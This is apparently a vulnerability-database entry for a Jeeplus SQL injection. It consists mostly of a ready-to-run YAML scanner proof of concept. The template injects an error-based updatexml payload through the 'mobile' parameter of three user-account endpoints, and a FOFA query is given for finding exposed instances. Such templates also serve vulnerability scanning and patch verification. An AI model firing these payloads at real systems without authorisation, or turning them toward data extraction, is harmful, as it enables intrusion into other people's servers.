jeeplus-sql-injection: Jeeplus SQL injection

日期: 2025-09-01 | 影响软件: Jeeplus | POC: 已公开

漏洞描述

FOFA: app="Jeeplus"

PoC代码[已公开]

id: jeeplus-sql-injection

info:
  name: Jeeplus SQL injection
  author: lsqm
  severity: high
  verified: true
  description: |
    FOFA: app="Jeeplus"
  reference:
    - https://www.freebuf.com/articles/web/220066.html
  tags: jeeplus,sqli
  created: 2023/06/25

rules:
  r0:
    request:
      method: GET
      path: /a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(73648273)),0x7e),1))%23
    expression: |
      response.status == 500 &&
      response.body.bcontains(b"8f944ae2aec88be6a997e2c77b1a3f4")
  r1:
    request:
      method: GET
      path: /a/sys/user/validateMobileExist?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(73648273)),0x7e),1))%23
    expression: |
      response.status == 500 &&
      response.body.bcontains(b"8f944ae2aec88be6a997e2c77b1a3f4")
  r2:
    request:
      method: GET
      path: /a/sys/user/validateMobile?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(73648273)),0x7e),1))%23
    expression: |
      response.status == 500 &&
      response.body.bcontains(b"8f944ae2aec88be6a997e2c77b1a3f4")
expression: r0() || r1() || r2()

相关漏洞推荐